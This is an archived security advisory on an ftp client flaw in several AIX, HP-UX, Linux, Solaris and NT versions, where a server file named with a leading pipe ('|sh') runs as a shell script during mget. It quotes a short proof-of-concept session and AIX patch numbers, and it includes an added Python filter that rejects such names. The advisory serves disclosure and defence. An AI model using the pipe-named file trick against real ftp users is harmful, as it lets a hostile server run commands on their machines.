COMMAND
ftp
SYSTEMS AFFECTED
AIX 3.2, 4.1, 4.2
HPUX 9.05, 9.07, 10.10, 10.20 (Others?)
Linux Slackware (Others?)
Solaris 2.5.1, 2.6 (Others?)
NTAS 4.0
PROBLEM
The ftp client can be tricked into running arbitrary commands
supplied by the remote server. When the remote file begins with
a pipe symbol, the ftp client will process the contents of the
remote file as a shell script. Remote ftp servers can cause
arbitrary commands to run on the local machine. This can include
remote root access. This also happens with netkit-ftp-0.10.
Andrew Green posted the following 'test':
$ id
uid=100(guest) gid=100(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x 2 guest usr 512 Nov 3 09:45 .
drwxrwxrwt 6 bin bin 1024 Nov 3 09:44 ..
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r-- 1 guest usr 28 Nov 3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)
$
The list of vulnerable systems above is the list of systems on which
this test has been performed successfully.
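The trigger in the transcript above is a remote file whose name starts with a pipe symbol, which the ftp client then treats as a command to run rather than a file to create. As an added example (not code from the advisory or from any ftp client), the following Python snippet shows the defensive check a client or a wrapper around mget should apply to each name taken from a remote "ls -l" listing before using it as a local filename. It rejects the pipe prefix described on this page and, as a generalisation, also names that would escape the current directory (absolute paths or ".." components), which is a related way a listing can steer where the client writes. The listing, the names in it and the function names are constructed for this example.

```python
from typing import Dict, List, Optional, Tuple
from pathlib import PurePosixPath

# Constructed sample of a remote directory listing, in the "ls -l" format
# shown in the advisory's transcript. The "|sh" entry is the pipe-prefix case.
SAMPLE_LISTING = """total 24
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 notes.txt
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 ../escape
"""


def names_from_listing(listing: str) -> List[str]:
    """Return the filename field of every 'ls -l' line, skipping the 'total' line.

    Splitting on at most 8 whitespace runs keeps a filename that itself
    contains spaces intact in the ninth field.
    """
    names = []
    for line in listing.splitlines():
        if not line.strip() or line.startswith("total "):
            continue
        parts = line.split(None, 8)  # mode, links, owner, group, size, month, day, time, name
        if len(parts) == 9:
            names.append(parts[8])
    return names


def unsafe_reason(name: str) -> Optional[str]:
    """Explain why a server-supplied name must not be used as a local filename, or None if it is acceptable."""
    if name.startswith("|"):
        # The advisory's case: classic ftp clients hand a name starting with
        # '|' to a shell instead of creating a file with that name.
        return "pipe prefix: name would be executed as a shell command"
    if name.startswith("/") or ".." in PurePosixPath(name).parts:
        # Generalisation (assumption, not from the advisory): a name that
        # resolves outside the working directory lets the server pick the
        # write location.
        return "path escapes the current directory"
    if name in ("", "."):
        return "empty or dot name"
    return None


def filter_mget(listing: str) -> Tuple[List[str], Dict[str, str]]:
    """Split a listing into names safe to retrieve and names rejected with a reason."""
    safe: List[str] = []
    rejected: Dict[str, str] = {}
    for name in names_from_listing(listing):
        reason = unsafe_reason(name)
        if reason is None:
            safe.append(name)
        else:
            rejected[name] = reason
    return safe, rejected


if __name__ == "__main__":
    ok, bad = filter_mget(SAMPLE_LISTING)
    print("would retrieve:", ok)
    for name, why in bad.items():
        print(f"refused {name!r}: {why}")
```

Run against the constructed listing, only "notes.txt" is retrieved; "|sh" and "../escape" are refused with their reasons. The point of the check is that the interactive "mget |sh? y" prompt seen in the transcript is not a safeguard: the user is asked whether to fetch the file, not whether to run a command, so the name has to be validated before it ever reaches the code that opens the local file.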
SOLUTION
Remove the setuid bit from the "ftp" command until installing
patches. This will make your ftp unusable. Patches are:
AIX 3.2............ no fixes available for AIX 3.2 (upgrade to a higher level)
AIX 4.1............ APAR - IX70885
AIX 4.2............ APAR - IX70886
AIX 4.3............ fix already contained in the release